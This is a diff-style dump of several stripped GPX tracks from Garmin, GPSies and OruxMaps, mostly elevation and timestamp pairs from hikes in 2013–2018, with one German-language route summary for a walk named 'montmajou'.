+2014-11-23T09:52:18Z
+
+
+1016.71
+2014-11-23T09:54:37Z
+
+
+1021.36
+2014-11-23T09:56:25Z
+
+
+1003.77
+2014-11-23T10:00:03Z
+
+
+1048.47
+2014-11-23T10:07:43Z
+
+
+1059.12
+2014-11-23T10:08:51Z
+
+
+1086.47
+2014-11-23T10:12:10Z
+
+
+1091.58
+2014-11-23T10:17:02Z
+
+
+1082.52
+2014-11-23T10:19:48Z
+
+
+1073.28
+2014-11-23T10:20:29Z
+
+
+1052.28
+2014-11-23T10:22:09Z
+
+
+1043.12
+2014-11-23T10:22:48Z
+
+
+1034.38
+2014-11-23T10:24:28Z
+
+
+1029.66
+2014-11-23T10:25:06Z
+
+
+1021.92
+2014-11-23T10:26:12Z
+
+
+1011.42
+2014-11-23T10:27:17Z
+
+
+1003.1
+2014-11-23T10:28:45Z
+
+
+991.51
+2014-11-23T10:30:09Z
+
+
+965.27
+2014-11-23T10:33:02Z
+
+
+883.24
+2014-11-23T10:40:40Z
+
+
+849.27
+2014-11-23T10:44:07Z
+
+
+833.93
+2014-11-23T10:45:22Z
+
+
+816.87
+2014-11-23T10:47:05Z
+
+
+811.62
+2014-11-23T10:47:31Z
+
+
+791.0
+2014-11-23T10:49:17Z
+
+
+779.33
+2014-11-23T10:50:02Z
+
+
+768.45
+2014-11-23T10:51:08Z
+
+
+761.01
+2014-11-23T10:52:25Z
+
+
+757.8
+2014-11-23T10:52:48Z
+
+
+746.09
+2014-11-23T10:55:37Z
+
+
+744.66
+2014-11-23T10:56:29Z
+
+
+741.29
+2014-11-23T10:57:40Z
+
+
+746.88
+2014-11-23T11:00:01Z
+
+
+747.6
+2014-11-23T11:00:30Z
+
+
+743.12
+2014-11-23T11:01:34Z
+
+
+740.59
+2014-11-23T11:01:56Z
+
+
+740.1
+2014-11-23T11:02:22Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-10-11T14:39:23Z
+
+PIANCAVALL 38:58
+
+
+
+
+
+1061.91
+2014-10-11T09:00:34Z
+
+
+1142.66
+2014-10-11T09:02:07Z
+
+
+1145.07
+2014-10-11T09:03:02Z
+
+
+1150.35
+2014-10-11T09:03:49Z
+
+
+1159.97
+2014-10-11T09:04:48Z
+
+
+1170.54
+2014-10-11T09:06:30Z
+
+
+1172.95
+2014-10-11T09:08:14Z
+
+
+1178.23
+2014-10-11T09:10:29Z
+
+
+1193.13
+2014-10-11T09:12:18Z
+
+
+1205.15
+2014-10-11T09:13:54Z
+
+
+1221.49
+2014-10-11T09:16:52Z
+
+
+1226.78
+2014-10-11T09:17:48Z
+
+
+1235.91
+2014-10-11T09:20:29Z
+
+
+1240.72
+2014-10-11T09:21:46Z
+
+
+1243.12
+2014-10-11T09:23:16Z
+
+
+1248.41
+2014-10-11T09:25:49Z
+
+
+1258.98
+2014-10-11T09:26:42Z
+
+
+1299.84
+2014-10-11T09:33:21Z
+
+
+1311.86
+2014-10-11T09:34:57Z
+
+
+1324.83
+2014-10-11T09:35:52Z
+
+
+1332.52
+2014-10-11T09:38:52Z
+
+
+1337.33
+2014-10-11T09:41:49Z
+
+
+1341.18
+2014-10-11T09:43:13Z
+
+
+1345.98
+2014-10-11T09:45:08Z
+
+
+1353.19
+2014-10-11T09:46:44Z
+
+
+1371.46
+2014-10-11T09:48:39Z
+
+
+1374.34
+2014-10-11T09:49:53Z
+
+
+1374.82
+2014-10-11T09:50:51Z
+
+
+1376.26
+2014-10-11T09:51:35Z
+
+
+1376.26
+2014-10-11T09:52:16Z
+
+
+1399.82
+2014-10-11T09:55:01Z
+
+
+1407.51
+2014-10-11T09:57:02Z
+
+
+1426.25
+2014-10-11T09:59:30Z
+
+
+1431.06
+2014-10-11T10:00:15Z
+
+
+1434.91
+2014-10-11T10:02:03Z
+
+
+1442.6
+2014-10-11T10:02:50Z
+
+
+1468.07
+2014-10-11T10:05:34Z
+
+
+1482.49
+2014-10-11T10:08:26Z
+
+
+1498.83
+2014-10-11T10:10:13Z
+
+
+1507.48
+2014-10-11T10:11:37Z
+
+
+1517.1
+2014-10-11T10:12:57Z
+
+
+1534.4
+2014-10-11T10:16:00Z
+
+
+1538.25
+2014-10-11T10:16:54Z
+
+
+1521.9
+2014-10-11T13:00:05Z
+
+
+1543.53
+2014-10-11T13:04:07Z
+
+
+1563.24
+2014-10-11T13:06:46Z
+
+
+1578.14
+2014-10-11T13:08:33Z
+
+
+1598.81
+2014-10-11T13:10:47Z
+
+
+1659.85
+2014-10-11T13:23:06Z
+
+
+1648.8
+2014-10-11T13:25:05Z
+
+
+1634.38
+2014-10-11T13:28:39Z
+
+
+1626.69
+2014-10-11T13:31:02Z
+
+
+1628.61
+2014-10-11T13:33:36Z
+
+
+1626.21
+2014-10-11T13:35:02Z
+
+
+1618.04
+2014-10-11T13:37:04Z
+
+
+1643.99
+2014-10-11T13:59:20Z
+
+
+1619.48
+2014-10-11T14:03:15Z
+
+
+1549.78
+2014-10-11T14:06:53Z
+
+
+1492.1
+2014-10-11T14:09:08Z
+
+
+1466.15
+2014-10-11T14:10:16Z
+
+
+1427.21
+2014-10-11T14:11:37Z
+
+
+1390.2
+2014-10-11T14:13:55Z
+
+
+1373.86
+2014-10-11T14:15:24Z
+
+
+1362.81
+2014-10-11T14:16:08Z
+
+
+1349.35
+2014-10-11T14:17:31Z
+
+
+1344.54
+2014-10-11T14:18:41Z
+
+
+1323.87
+2014-10-11T14:21:03Z
+
+
+1320.99
+2014-10-11T14:22:48Z
+
+
+1316.66
+2014-10-11T14:24:06Z
+
+
+1280.13
+2014-10-11T14:26:17Z
+
+
+1243.6
+2014-10-11T14:27:56Z
+
+
+1234.47
+2014-10-11T14:29:04Z
+
+
+1217.17
+2014-10-11T14:30:49Z
+
+
+1205.63
+2014-10-11T14:31:21Z
+
+
+1191.69
+2014-10-11T14:32:43Z
+
+
+1184.0
+2014-10-11T14:34:18Z
+
+
+1182.56
+2014-10-11T14:35:44Z
+
+
+1171.02
+2014-10-11T14:36:36Z
+
+
+1161.89
+2014-10-11T14:37:06Z
+
+
+1143.63
+2014-10-11T14:39:22Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+426.0
+2018-02-03T10:40:05Z
+
+
+426.0
+2018-02-03T10:41:45Z
+
+
+426.0
+2018-02-03T10:42:25Z
+
+
+426.0
+2018-02-03T10:46:55Z
+
+
+426.0
+2018-02-03T10:48:38Z
+
+
+430.0
+2018-02-03T10:52:01Z
+
+
+433.0
+2018-02-03T10:54:50Z
+
+
+436.0
+2018-02-03T10:56:54Z
+
+
+438.0
+2018-02-03T10:58:42Z
+
+
+437.0
+2018-02-03T11:00:18Z
+
+
+435.0
+2018-02-03T11:03:19Z
+
+
+435.0
+2018-02-03T11:04:28Z
+
+
+434.0
+2018-02-03T11:05:50Z
+
+
+428.0
+2018-02-03T11:09:31Z
+
+
+424.0
+2018-02-03T11:13:09Z
+
+
+428.0
+2018-02-03T11:14:05Z
+
+
+427.0
+2018-02-03T11:16:06Z
+
+
+426.0
+2018-02-03T11:18:32Z
+
+
+426.0
+2018-02-03T11:19:53Z
+
+
+427.0
+2018-02-03T11:24:53Z
+
+
+428.0
+2018-02-03T11:25:07Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-10-08T12:15:06Z
+
+2014-10-08 14:15:02
+
+
+
+
+
+
+2297.93
+2014-10-08T08:08:01Z
+
+
+2305.57
+2014-10-08T08:11:28Z
+
+
+2312.68
+2014-10-08T08:13:13Z
+
+
+2331.06
+2014-10-08T08:17:42Z
+
+
+2348.82
+2014-10-08T08:21:51Z
+
+
+2355.67
+2014-10-08T08:22:48Z
+
+
+2370.15
+2014-10-08T08:24:59Z
+
+
+2434.94
+2014-10-08T08:37:07Z
+
+
+2467.43
+2014-10-08T08:43:41Z
+
+
+2476.58
+2014-10-08T08:48:31Z
+
+
+2512.42
+2014-10-08T08:54:07Z
+
+
+2522.13
+2014-10-08T08:56:32Z
+
+
+2546.73
+2014-10-08T09:00:55Z
+
+
+2553.65
+2014-10-08T09:02:01Z
+
+
+2561.84
+2014-10-08T09:03:25Z
+
+
+2589.72
+2014-10-08T09:08:45Z
+
+
+2648.71
+2014-10-08T09:19:44Z
+
+
+2670.44
+2014-10-08T09:24:12Z
+
+
+2694.36
+2014-10-08T09:30:30Z
+
+
+2755.35
+2014-10-08T09:45:57Z
+
+
+2829.5
+2014-10-08T10:06:47Z
+
+
+2813.08
+2014-10-08T10:28:32Z
+
+
+2781.86
+2014-10-08T10:37:12Z
+
+
+2773.57
+2014-10-08T10:38:36Z
+
+
+2743.42
+2014-10-08T10:46:46Z
+
+
+2727.76
+2014-10-08T10:49:52Z
+
+
+2690.01
+2014-10-08T10:57:27Z
+
+
+2627.03
+2014-10-08T11:06:06Z
+
+
+2612.53
+2014-10-08T11:13:11Z
+
+
+2601.42
+2014-10-08T11:16:04Z
+
+
+2593.47
+2014-10-08T11:17:17Z
+
+
+2586.59
+2014-10-08T11:18:25Z
+
+
+2581.51
+2014-10-08T11:19:45Z
+
+
+2578.33
+2014-10-08T11:23:46Z
+
+
+2555.74
+2014-10-08T11:27:09Z
+
+
+2547.12
+2014-10-08T11:27:57Z
+
+
+2523.76
+2014-10-08T11:31:38Z
+
+
+2495.87
+2014-10-08T11:34:16Z
+
+
+2466.38
+2014-10-08T11:37:26Z
+
+
+2448.88
+2014-10-08T11:43:55Z
+
+
+2444.47
+2014-10-08T11:47:57Z
+
+
+2443.84
+2014-10-08T11:49:52Z
+
+
+2444.38
+2014-10-08T11:51:22Z
+
+
+2433.82
+2014-10-08T11:54:03Z
+
+
+2409.81
+2014-10-08T11:57:43Z
+
+
+2368.57
+2014-10-08T12:02:01Z
+
+
+2351.65
+2014-10-08T12:04:21Z
+
+
+2347.53
+2014-10-08T12:04:58Z
+
+
+2333.04
+2014-10-08T12:06:16Z
+
+
+2327.76
+2014-10-08T12:07:12Z
+
+
+2307.32
+2014-10-08T12:11:03Z
+
+
+2301.07
+2014-10-08T12:12:22Z
+
+
+2294.37
+2014-10-08T12:14:57Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-15T21:02:43Z
+
+
+Traccia corrente: 02 AGO 2015 16:50
+
+
+
+
+
+
+
+
+1308.49
+2015-08-02T14:50:07Z
+
+
+1295.99
+2015-08-02T14:59:34Z
+
+
+1297.44
+2015-08-02T15:01:23Z
+
+
+1335.41
+2015-08-02T15:05:05Z
+
+
+1338.77
+2015-08-02T15:05:46Z
+
+
+1345.5
+2015-08-02T15:07:24Z
+
+
+1345.02
+2015-08-02T15:08:46Z
+
+
+1356.56
+2015-08-02T15:10:50Z
+
+
+1375.78
+2015-08-02T15:13:56Z
+
+
+1378.19
+2015-08-02T15:15:07Z
+
+
+1376.75
+2015-08-02T15:15:45Z
+
+
+1392.13
+2015-08-02T15:17:37Z
+
+
+1393.57
+2015-08-02T15:18:12Z
+
+
+1408.47
+2015-08-02T15:22:31Z
+
+
+1373.86
+2015-08-02T15:24:13Z
+
+
+1312.82
+2015-08-02T15:27:02Z
+
+
+1305.13
+2015-08-02T15:28:55Z
+
+
+1308.49
+2015-08-02T15:30:17Z
+
+
+1358.0
+2015-08-02T15:31:19Z
+
+
+1356.08
+2015-08-02T15:32:03Z
+
+
+1363.77
+2015-08-02T15:35:42Z
+
+
+1371.94
+2015-08-02T15:38:15Z
+
+
+1363.77
+2015-08-02T15:40:03Z
+
+
+1362.81
+2015-08-02T15:40:55Z
+
+
+1364.73
+2015-08-02T15:41:36Z
+
+
+1378.19
+2015-08-02T15:43:14Z
+
+
+1384.92
+2015-08-02T15:43:44Z
+
+
+1389.24
+2015-08-02T15:44:37Z
+
+
+1403.66
+2015-08-02T15:48:47Z
+
+
+1409.43
+2015-08-02T15:49:26Z
+
+
+1425.29
+2015-08-02T15:50:27Z
+
+
+1447.88
+2015-08-02T15:52:49Z
+
+
+1461.34
+2015-08-02T15:56:40Z
+
+
+1503.16
+2015-08-02T15:59:34Z
+
+
+1530.56
+2015-08-02T16:03:53Z
+
+
+1557.95
+2015-08-02T16:08:04Z
+
+
+1596.89
+2015-08-02T16:12:06Z
+
+
+1639.67
+2015-08-02T16:16:54Z
+
+
+1679.56
+2015-08-02T16:21:35Z
+
+
+1687.73
+2015-08-02T16:29:22Z
+
+
+1688.69
+2015-08-02T16:31:27Z
+
+
+1694.46
+2015-08-02T16:32:06Z
+
+
+1714.17
+2015-08-02T16:34:03Z
+
+
+1733.39
+2015-08-02T16:35:31Z
+
+
+1760.31
+2015-08-02T16:38:00Z
+
+
+1763.2
+2015-08-02T16:39:10Z
+
+
+1780.02
+2015-08-02T16:41:26Z
+
+
+1788.19
+2015-08-02T16:42:14Z
+
+
+1828.08
+2015-08-02T16:50:12Z
+
+
+1837.7
+2015-08-02T16:52:16Z
+
+
+1886.72
+2015-08-02T16:57:08Z
+
+
+1882.4
+2015-08-02T16:58:29Z
+
+
+1901.14
+2015-08-02T17:00:00Z
+
+
+1917.01
+2015-08-02T17:01:31Z
+
+
+1942.48
+2015-08-02T17:04:47Z
+
+
+1998.72
+2015-08-02T17:12:24Z
+
+
+2000.16
+2015-08-02T17:13:10Z
+
+
+2005.45
+2015-08-02T17:13:56Z
+
+
+2011.7
+2015-08-02T17:14:42Z
+
+
+2030.44
+2015-08-02T17:17:04Z
+
+
+2040.54
+2015-08-02T17:18:48Z
+
+
+2057.84
+2015-08-02T17:20:38Z
+
+
+2071.3
+2015-08-02T17:27:29Z
+
+
+2068.41
+2015-08-02T17:27:56Z
+
+
+2087.16
+2015-08-02T17:57:37Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-04-30T08:18:05Z
+
+2016-04-30 10:18:03
+
+
+
+
+
+
+796.53
+2016-04-30T07:07:31Z
+
+
+795.66
+2016-04-30T07:09:07Z
+
+
+795.89
+2016-04-30T07:10:02Z
+
+
+795.49
+2016-04-30T07:10:37Z
+
+
+794.18
+2016-04-30T07:10:57Z
+
+
+796.03
+2016-04-30T07:11:48Z
+
+
+805.63
+2016-04-30T07:12:53Z
+
+
+810.14
+2016-04-30T07:13:44Z
+
+
+815.36
+2016-04-30T07:14:47Z
+
+
+822.3
+2016-04-30T07:16:25Z
+
+
+822.88
+2016-04-30T07:16:55Z
+
+
+831.56
+2016-04-30T07:18:41Z
+
+
+851.74
+2016-04-30T07:21:02Z
+
+
+860.25
+2016-04-30T07:21:56Z
+
+
+877.16
+2016-04-30T07:23:51Z
+
+
+903.56
+2016-04-30T07:27:06Z
+
+
+903.97
+2016-04-30T07:28:21Z
+
+
+905.45
+2016-04-30T07:28:50Z
+
+
+906.15
+2016-04-30T07:29:13Z
+
+
+912.96
+2016-04-30T07:29:59Z
+
+
+929.58
+2016-04-30T07:31:40Z
+
+
+942.06
+2016-04-30T07:32:54Z
+
+
+962.19
+2016-04-30T07:34:57Z
+
+
+973.07
+2016-04-30T07:36:04Z
+
+
+977.62
+2016-04-30T07:36:36Z
+
+
+993.21
+2016-04-30T07:39:32Z
+
+
+996.96
+2016-04-30T07:40:28Z
+
+
+1001.14
+2016-04-30T07:41:45Z
+
+
+1003.27
+2016-04-30T07:42:04Z
+
+
+1011.33
+2016-04-30T07:43:10Z
+
+
+1021.07
+2016-04-30T07:44:21Z
+
+
+1025.27
+2016-04-30T07:46:09Z
+
+
+1253.54
+2016-04-30T08:18:00Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-10-31T22:42:56Z
+
+GPSies Track on GPSies.com
+
+
+
+903.0
+2010-01-01T00:00:00Z
+
+
+905.0
+2010-01-01T00:00:29Z
+
+
+917.0
+2010-01-01T00:00:45Z
+
+
+937.0
+2010-01-01T00:01:23Z
+
+
+944.0
+2010-01-01T00:01:53Z
+
+
+975.0
+2010-01-01T00:02:25Z
+
+
+1006.0
+2010-01-01T00:03:33Z
+
+
+1009.0
+2010-01-01T00:04:09Z
+
+
+1022.0
+2010-01-01T00:04:54Z
+
+
+1047.0
+2010-01-01T00:05:45Z
+
+
+1050.0
+2010-01-01T00:06:10Z
+
+
+1058.0
+2010-01-01T00:06:53Z
+
+
+1091.0
+2010-01-01T00:07:48Z
+
+
+1097.0
+2010-01-01T00:07:58Z
+
+
+1084.0
+2010-01-01T00:08:22Z
+
+
+1094.0
+2010-01-01T00:08:34Z
+
+
+1127.0
+2010-01-01T00:09:20Z
+
+
+1155.0
+2010-01-01T00:09:42Z
+
+
+1144.0
+2010-01-01T00:10:00Z
+
+
+1136.0
+2010-01-01T00:10:25Z
+
+
+1137.0
+2010-01-01T00:10:41Z
+
+
+1159.0
+2010-01-01T00:11:34Z
+
+
+1158.0
+2010-01-01T00:12:15Z
+
+
+1161.0
+2010-01-01T00:12:44Z
+
+
+1190.0
+2010-01-01T00:13:29Z
+
+
+1193.0
+2010-01-01T00:14:03Z
+
+
+1210.0
+2010-01-01T00:14:38Z
+
+
+1228.0
+2010-01-01T00:15:19Z
+
+
+1238.0
+2010-01-01T00:15:42Z
+
+
+1240.0
+2010-01-01T00:15:59Z
+
+
+1244.0
+2010-01-01T00:16:38Z
+
+
+1284.0
+2010-01-01T00:18:13Z
+
+
+1296.0
+2010-01-01T00:19:04Z
+
+
+1327.0
+2010-01-01T00:19:47Z
+
+
+1366.0
+2010-01-01T00:21:24Z
+
+
+1363.0
+2010-01-01T00:22:45Z
+
+
+1378.0
+2010-01-01T00:23:31Z
+
+
+1444.0
+2010-01-01T00:24:23Z
+
+
+1494.0
+2010-01-01T00:25:07Z
+
+
+1527.0
+2010-01-01T00:25:39Z
+
+
+1557.0
+2010-01-01T00:26:15Z
+
+
+1581.0
+2010-01-01T00:27:14Z
+
+
+1616.0
+2010-01-01T00:27:40Z
+
+
+1626.0
+2010-01-01T00:27:57Z
+
+
+1653.0
+2010-01-01T00:28:23Z
+
+
+1707.0
+2010-01-01T00:29:46Z
+
+
+1714.0
+2010-01-01T00:31:12Z
+
+
+1595.0
+2010-01-01T00:33:58Z
+
+
+1566.0
+2010-01-01T00:34:35Z
+
+
+1517.0
+2010-01-01T00:35:56Z
+
+
+1498.0
+2010-01-01T00:36:13Z
+
+
+1476.0
+2010-01-01T00:36:49Z
+
+
+1482.0
+2010-01-01T00:37:43Z
+
+
+1428.0
+2010-01-01T00:39:31Z
+
+
+1409.0
+2010-01-01T00:40:08Z
+
+
+1347.0
+2010-01-01T00:42:01Z
+
+
+1319.0
+2010-01-01T00:42:59Z
+
+
+1294.0
+2010-01-01T00:43:43Z
+
+
+1302.0
+2010-01-01T00:44:01Z
+
+
+1246.0
+2010-01-01T00:45:14Z
+
+
+1235.0
+2010-01-01T00:45:45Z
+
+
+1206.0
+2010-01-01T00:46:22Z
+
+
+1200.0
+2010-01-01T00:47:15Z
+
+
+1211.0
+2010-01-01T00:48:23Z
+
+
+1187.0
+2010-01-01T00:49:08Z
+
+
+1186.0
+2010-01-01T00:49:26Z
+
+
+1194.0
+2010-01-01T00:49:49Z
+
+
+1193.0
+2010-01-01T00:50:15Z
+
+
+1175.0
+2010-01-01T00:51:11Z
+
+
+1161.0
+2010-01-01T00:51:30Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-12T05:47:38Z
+
+
+07.10.15, 14:00:03
+
+
+
+
+
+
+1068.4000244140625
+2015-10-07T12:00:03Z
+
+
+
+
+
+1068.5999755859375
+2015-10-07T12:00:30Z
+
+
+
+
+
+1081.5999755859375
+2015-10-07T12:02:35Z
+
+
+
+
+
+1087.0
+2015-10-07T12:03:32Z
+
+
+
+
+
+1090.199951171875
+2015-10-07T12:03:52Z
+
+
+
+
+
+1105.0
+2015-10-07T12:06:00Z
+
+
+
+
+
+1110.800048828125
+2015-10-07T12:07:00Z
+
+
+
+
+
+1116.800048828125
+2015-10-07T12:07:49Z
+
+
+
+
+
+1122.199951171875
+2015-10-07T12:08:45Z
+
+
+
+
+
+1129.0
+2015-10-07T12:09:54Z
+
+
+
+
+
+1134.5999755859375
+2015-10-07T12:11:12Z
+
+
+
+
+
+1142.4000244140625
+2015-10-07T12:12:52Z
+
+
+
+
+
+1158.800048828125
+2015-10-07T12:15:18Z
+
+
+
+
+
+1170.5999755859375
+2015-10-07T12:17:01Z
+
+
+
+
+
+1189.800048828125
+2015-10-07T12:19:26Z
+
+
+
+
+
+1227.0
+2015-10-07T12:26:14Z
+
+
+
+
+
+1234.0
+2015-10-07T12:27:32Z
+
+
+
+
+
+1267.4000244140625
+2015-10-07T12:32:12Z
+
+
+
+
+
+1303.5999755859375
+2015-10-07T12:37:07Z
+
+
+
+
+
+1314.4000244140625
+2015-10-07T12:38:56Z
+
+
+
+
+
+1322.199951171875
+2015-10-07T12:40:01Z
+
+
+
+
+
+1338.199951171875
+2015-10-07T12:42:11Z
+
+
+
+
+
+1350.0
+2015-10-07T12:43:58Z
+
+
+
+
+
+1356.5999755859375
+2015-10-07T12:44:56Z
+
+
+
+
+
+1364.199951171875
+2015-10-07T12:46:32Z
+
+
+
+
+
+1371.4000244140625
+2015-10-07T12:48:01Z
+
+
+
+
+
+1369.4000244140625
+2015-10-07T12:48:49Z
+
+
+
+
+
+1366.5999755859375
+2015-10-07T12:49:52Z
+
+
+
+
+
+1364.800048828125
+2015-10-07T12:50:46Z
+
+
+
+
+
+1357.4000244140625
+2015-10-07T12:51:24Z
+
+
+
+
+
+1369.199951171875
+2015-10-07T12:53:21Z
+
+
+
+
+
+1378.0
+2015-10-07T12:54:27Z
+
+
+
+
+
+1391.199951171875
+2015-10-07T12:56:12Z
+
+
+
+
+
+1392.199951171875
+2015-10-07T12:57:39Z
+
+
+
+
+
+1385.0
+2015-10-07T12:59:52Z
+
+
+
+
+
+1376.0
+2015-10-07T13:00:39Z
+
+
+
+
+
+1357.800048828125
+2015-10-07T13:02:58Z
+
+
+
+
+
+1350.4000244140625
+2015-10-07T13:03:46Z
+
+
+
+
+
+1346.0
+2015-10-07T13:04:08Z
+
+
+
+
+
+1325.199951171875
+2015-10-07T13:05:10Z
+
+
+
+ "
+"
+
+
+Tourenplanung am 7. November 2016
+
+TemporaryUserGroup
+
+
+
+2016-11-07T19:59:03Z
+
+Tourenplanung am 7. November 2016
+
+
+
+1204.36459
+
+
+1214.78278
+
+
+1230.2255
+
+
+1237.64696
+
+
+1240.17802
+
+
+1275.58264
+
+
+1297.04646
+
+
+1313.84676
+
+
+1329.27552
+
+
+1350.13497
+
+
+1364.14695
+
+
+1387.14739
+
+
+1394.12419
+
+
+1416.64367
+
+
+1423.92242
+
+
+1443.29222
+
+
+1456.57622
+
+
+1463.15341
+
+
+1463.75358
+
+
+1465.89958
+
+
+1465.62732
+
+
+1471.10228
+
+
+1494.85086
+
+
+1517.44553
+
+
+1535.83912
+
+
+1542.47326
+
+
+1539.50739
+
+
+1556.96686
+
+
+1564.23667
+
+
+1583.06819
+
+
+1591.47857
+
+
+1610.10828
+
+
+1610.33172
+
+
+1626.70001
+
+
+1641.41581
+
+
+1719.19128
+
+
+1712.40624
+
+
+1709.4172
+
+
+1740.02139
+
+
+1748.32913
+
+
+1757.03634
+
+
+1775.18182
+
+
+1785.2161
+
+
+1803.86796
+
+
+1830.40062
+
+
+1846.90585
+
+
+1868.29841
+
+
+1871.42091
+
+
+1885.6176
+
+
+1943.30125
+
+
+1968.57261
+
+
+1971.71536
+
+
+1961.70555
+
+
+1975.65621
+
+
+1991.76978
+
+
+2000.5434
+
+
+2002.07228
+
+
+2007.37516
+
+
+2022.64264
+
+
+2033.97951
+
+
+2047.58328
+
+
+2062.77895
+
+
+2074.09415
+
+
+2093.61566
+
+
+2099.51138
+
+
+2105.81257
+
+
+2119.57224
+
+
+2132.60845
+
+
+2118.86563
+
+
+2162.37126
+
+
+2209.88382
+
+
+2209.55001
+
+
+2264.01609
+
+
+2315.46692
+
+
+2358.90867
+ "
+"
+
+
+
+
+
+
+Garmin International
+2013-01-02T12:06:02Z
+
+02-JAN-13 13:06:00
+
+
+
+
+
+1169.58
+2013-01-02T09:24:54Z
+
+
+1171.5
+2013-01-02T09:25:59Z
+
+
+1181.6
+2013-01-02T09:28:08Z
+
+
+1188.33
+2013-01-02T09:28:46Z
+
+
+1211.88
+2013-01-02T09:31:32Z
+
+
+1224.38
+2013-01-02T09:32:40Z
+
+
+1238.8
+2013-01-02T09:34:34Z
+
+
+1249.85
+2013-01-02T09:35:30Z
+
+
+1271.0
+2013-01-02T09:37:43Z
+
+
+1281.09
+2013-01-02T09:39:30Z
+
+
+1322.43
+2013-01-02T09:44:24Z
+
+
+1349.83
+2013-01-02T09:46:57Z
+
+
+1354.15
+2013-01-02T09:47:39Z
+
+
+1396.93
+2013-01-02T09:53:58Z
+
+
+1439.23
+2013-01-02T09:58:33Z
+
+
+1464.71
+2013-01-02T10:01:11Z
+
+
+1536.8
+2013-01-02T10:11:13Z
+
+
+1553.63
+2013-01-02T10:14:04Z
+
+
+1561.32
+2013-01-02T10:17:09Z
+
+
+1571.89
+2013-01-02T10:19:58Z
+
+
+1580.06
+2013-01-02T10:23:47Z
+
+
+1591.6
+2013-01-02T10:26:38Z
+
+
+1598.33
+2013-01-02T10:27:45Z
+
+
+1604.1
+2013-01-02T10:28:49Z
+
+
+1631.49
+2013-01-02T10:33:16Z
+
+
+1660.81
+2013-01-02T10:36:33Z
+
+
+1674.27
+2013-01-02T10:39:28Z
+
+
+1694.46
+2013-01-02T10:43:55Z
+
+
+1706.48
+2013-01-02T10:45:25Z
+
+
+1713.69
+2013-01-02T10:47:50Z
+
+
+1708.4
+2013-01-02T11:00:49Z
+
+
+1693.98
+2013-01-02T11:02:04Z
+
+
+1691.58
+2013-01-02T11:02:28Z
+
+
+1689.17
+2013-01-02T11:05:03Z
+
+
+1664.18
+2013-01-02T11:08:30Z
+
+
+1649.28
+2013-01-02T11:09:32Z
+
+
+1637.74
+2013-01-02T11:10:33Z
+
+
+1613.23
+2013-01-02T11:12:49Z
+
+
+1591.12
+2013-01-02T11:15:47Z
+
+
+1586.79
+2013-01-02T11:17:17Z
+
+
+1588.24
+2013-01-02T11:18:21Z
+
+
+1577.18
+2013-01-02T11:21:11Z
+
+
+1558.92
+2013-01-02T11:25:53Z
+
+
+1556.51
+2013-01-02T11:26:31Z
+
+
+1552.19
+2013-01-02T11:28:20Z
+
+
+1532.96
+2013-01-02T11:30:52Z
+
+
+1466.15
+2013-01-02T11:36:05Z
+
+
+1450.77
+2013-01-02T11:37:22Z
+
+
+1437.79
+2013-01-02T11:38:23Z
+
+
+1417.12
+2013-01-02T11:40:22Z
+
+
+1417.6
+2013-01-02T11:41:15Z
+
+
+1393.57
+2013-01-02T11:43:42Z
+
+
+1347.43
+2013-01-02T11:48:59Z
+
+
+1316.66
+2013-01-02T11:50:56Z
+
+
+1306.09
+2013-01-02T11:52:23Z
+
+
+1285.42
+2013-01-02T11:54:42Z
+
+
+1263.79
+2013-01-02T11:56:30Z
+
+
+1245.04
+2013-01-02T11:57:42Z
+
+
+1230.14
+2013-01-02T11:58:56Z
+
+
+1220.05
+2013-01-02T11:59:56Z
+
+
+1199.86
+2013-01-02T12:01:31Z
+
+
+1178.71
+2013-01-02T12:03:44Z
+
+
+1166.7
+2013-01-02T12:05:47Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+montmajou
+
+
+
+
+
+OruxMaps
+2016-02-04T09:55:38Z
+
+
+montmajou
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: montmajou</h2><br /><p>Startzeit: 02/04/2016 10:55</p><p>Zielzeit: 02/04/2016 13:39</p><p>Strecke: 6,4km (02:43)</p><p>Bewegungszeit: 02:05</p><p>Ø-Geschwindigkeit: 2,4km/h</p><p>Netto-Geschwindigkeit: 3,1km/h</p><p>Max. Geschwindigkeit: 8,7km/h</p><p>Minimale Höhe: 1223m</p><p>Maximale Höhe: 2080m</p><p>Steig-Geschw.: 350m/h</p><p>Sink-Geschw.: -177,1m/h</p><p>Aufstieg: 877m</p><p>Abstieg: -28m</p><p>Steigzeit: 02:30</p><p>Sinkzeit: 00:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1231.77
+2016-02-04T09:55:39Z
+
+
+1242.79
+2016-02-04T09:55:47Z
+
+
+1235.24
+2016-02-04T09:57:41Z
+
+
+1232.68
+2016-02-04T09:58:31Z
+
+
+1223.76
+2016-02-04T10:00:03Z
+
+
+1228.3
+2016-02-04T10:01:26Z
+
+
+1223.27
+2016-02-04T10:01:52Z
+
+
+1249.27
+2016-02-04T10:05:00Z
+
+
+1271.9
+2016-02-04T10:07:47Z
+
+
+1290.26
+2016-02-04T10:10:14Z
+
+
+1291.63
+2016-02-04T10:10:36Z
+
+
+1301.27
+2016-02-04T10:11:54Z
+
+
+1307.27
+2016-02-04T10:14:12Z
+
+
+1321.26
+2016-02-04T10:16:49Z
+
+
+1332.23
+2016-02-04T10:18:42Z
+
+
+1341.14
+2016-02-04T10:19:54Z
+
+
+1366.24
+2016-02-04T10:22:52Z
+
+
+1376.74
+2016-02-04T10:24:11Z
+
+
+1366.42
+2016-02-04T10:25:13Z
+
+
+1400.42
+2016-02-04T10:27:59Z
+
+
+1436.1
+2016-02-04T10:31:57Z
+
+
+1439.27
+2016-02-04T10:33:18Z
+
+
+1451.27
+2016-02-04T10:34:57Z
+
+
+1476.6
+2016-02-04T10:37:11Z
+
+
+1485.29
+2016-02-04T10:39:42Z
+
+
+1488.26
+2016-02-04T10:41:03Z
+
+
+1501.16
+2016-02-04T10:43:29Z
+
+
+1518.26
+2016-02-04T10:46:29Z
+
+
+1536.25
+2016-02-04T10:47:43Z
+
+
+1544.27
